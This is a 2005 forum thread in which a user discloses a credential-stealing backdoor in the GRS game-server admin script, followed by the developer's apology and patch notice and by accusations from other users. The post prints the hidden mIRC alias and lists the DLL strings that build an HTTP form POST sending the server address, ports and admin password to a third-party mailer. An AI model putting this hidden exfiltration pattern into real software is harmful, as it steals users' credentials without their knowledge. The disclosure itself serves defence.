WARNING: GRS emails your admin password!

[Guest]

while looking through the GRS mtama.mrc i noticed a interesting alias:

alias updatecheck {

!dll " $+ $grs.dir $+ mtama.dll" updatecheckone $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwo $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthree $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckfour $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckfive $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecksix $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckseven $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckeight $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecknine $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckfourtyone $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckten $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckeleven $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwelve $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirteen $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckfourteen $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckfifteen $1-

!dll " $+ $grs.dir $+ mtama.dll" updatechecksixteen $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckseventeen $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckeighteen $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecknineteen $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwenty $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyone $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentytwo $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentythree $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyfour $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyfive $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentysix $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyseven $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentyeight $1- | !dll " $+ $grs.dir $+ mtama.dll" updatechecktwentynine $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirty $1-

!dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyone $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtytwo $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtythree $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyfour $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyfive $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtysix $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyseven $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtyeight $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckthirtynine $1- | !dll " $+ $grs.dir $+ mtama.dll" updatecheckfourty $1-

}

this calls 41 separate functions in mtama.dll which are called updatecheckone to updatecheckfortyone

this on its own is suspisios, so i searched the dll for those functions to see what they do

here is a table of a string i found associated to each function (each string has "!sockwrite -n updatecheck" before it):

updatecheckone          POST /Formular-Chef/Formular-Chef.cgi HTTP/1.1
updatechecktwo          Request Method: POST
updatecheckthree        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54u1  [en]
updatecheckfour         Host: www.nettz.de
updatecheckfive         Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
updatechecksix          Accept-Languages: en
updatecheckseven        Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
updatecheckeight        Accept-Encoding: deflate, gzip, x-gzip, identify, *;q=0
updatechecknine         Connection: Keep-Alive, TE
updatecheckfourtyone    TE: deflate, gzip, chunked, identify, trailers
updatecheckten          Content-Length: $calc(586 + $len())
updatecheckeleven       Content-Type: multipart/form-data; boundary=----------Vj6fDTNqR6sjFiGAv8pDm7
updatechecktwelve
updatecheckthirteen     ------------Vj6fDTNqR6sjFiGAv8pDm7
updatecheckfourteen     Content-Disposition: form-data; name="name1"
updatecheckfifteen
updatechecksixteen      GRS
updatecheckseventeen    ------------Vj6fDTNqR6sjFiGAv8pDm7
updatecheckeighteen     Content-Disposition: form-data; name="absender"
updatechecknineteen
updatechecktwenty       [email protected]
updatechecktwentyone    ------------Vj6fDTNqR6sjFiGAv8pDm7
updatechecktwentytwo    Content-Disposition: form-data; name="name2"
updatechecktwentythree
updatechecktwentyfour   GRS
updatechecktwentyfive   ------------Vj6fDTNqR6sjFiGAv8pDm7
updatechecktwentysix    Content-Disposition: form-data; name="empfaenger"
updatechecktwentyseven
updatechecktwentyeight  [email protected]
updatechecktwentynine   ------------Vj6fDTNqR6sjFiGAv8pDm7
updatecheckthirty       Content-Disposition: form-data; name="text"
updatecheckthirtyone
updatecheckthirtytwo
updatecheckthirtythree  Server:
updatecheckthirtyfour   Admin Port:
updatecheckthirtyfive   Client Port:
updatecheckthirtysix    Password:
updatecheckthirtyseven  name:
updatecheckthirtyeight  GRS Version:
updatecheckthirtynine   ------------Vj6fDTNqR6sjFiGAv8pDm7
updatecheckfourty

it is a form reply (like your computer sends when you press submit on a form)

it sends your admin details to http://www.nettz.de , which then sends an email to [email protected] (ive tested it with another email)

anyone can see this by disassembling the mtama.dll file

[[UVA]ReSeT]

LOL!!!

[Si|ent]

Thankyou for pointing this out, let's hope you are mistaken. Needless to say we were unaware that anything of this nature was buried within MTAmA or GRS but we mustn't jump to conclusions. Rest assured that we will investigate why it is included and exactly what it does and act accordingly.

[Aeron]

/me slaps Oli

As this happens in mtama.dll which I didn't create, I think Oli all alone is behind it.

Edited November 3, 2005 by Guest

[So'lide]

er.. WTF?

[XcR]

lol.... just lol

[Oli]

im looking into this right now. As i didn't write most of that dll (mtama.dll is in pascal which i dont know, grs.dll is in c++ which i did write) im not sure what the deal is right now, so please bear with me.

[So'lide]

Sounds delightful.. Or does it.. Someone is using you! Run for your life!

/me hides.

[jhxp]

well, nice find

[[XII]Fexsi0n]

Would like to know who owns that email addy...

Surprising.

[Oli]

ok, im not sure if the dll did email that information out, but i have removed everything in it to do with that.

PLEASE CAN EVERYONE WHO USES GRS UPDATE IT NOW DUE TO THIS SECURITY ISSUE.

The autoupdater should warn you about this.

I would also like to apologise to all those who have used GRS over the past months. I didn't fully read the source code to that dll and i should have. Terribly sorry about this.

I suggest ALL SERVERS WHO HAVE USED GRS CHANGE THEIR PASSWORD NOW!!!

Thanks to omlette for finding this.

Im gonna lock this and make an announcement in the GRS thread about it.

I am trying to contact the person who helped with this dll, but it was nearly a year ago and im not having much luck.

[Jani]

Bullshit.

[So'lide]

Happy ending.. Or so?

[Jani]

That's a total lie (Oli), you obviously do know pascal, why would you just let some random person code a huge part of a DLL and not even check it?

And then not that long ago, you were kicking people off the SGB server from remote admin. I can't believe you did some kind of shit like this.

And you just said yourself that you don't know pascal, and then the next post you say you've fixed it, but how can you fix it if you don't know pascal?

It's such a shame that hundreds of people trusted your script and all the time you were hacking their admin passwords.

Edited November 3, 2005 by Guest

[[UVA]ReSeT]

not cool

[Oli]

That's a total lie (Oli), you obviously do know pascal, why would you just let some random person code a huge part of a DLL and not even check it?

And then not that long ago, you were kicking people off the SGB server from remote admin. I can't believe you did some kind of shit like this.

Jani, I have said what happened, believe it or don't, I am really ashamed that this was part of my product. You can think what you want i guess. (I had the sgb pass legitimately from ages ago btw).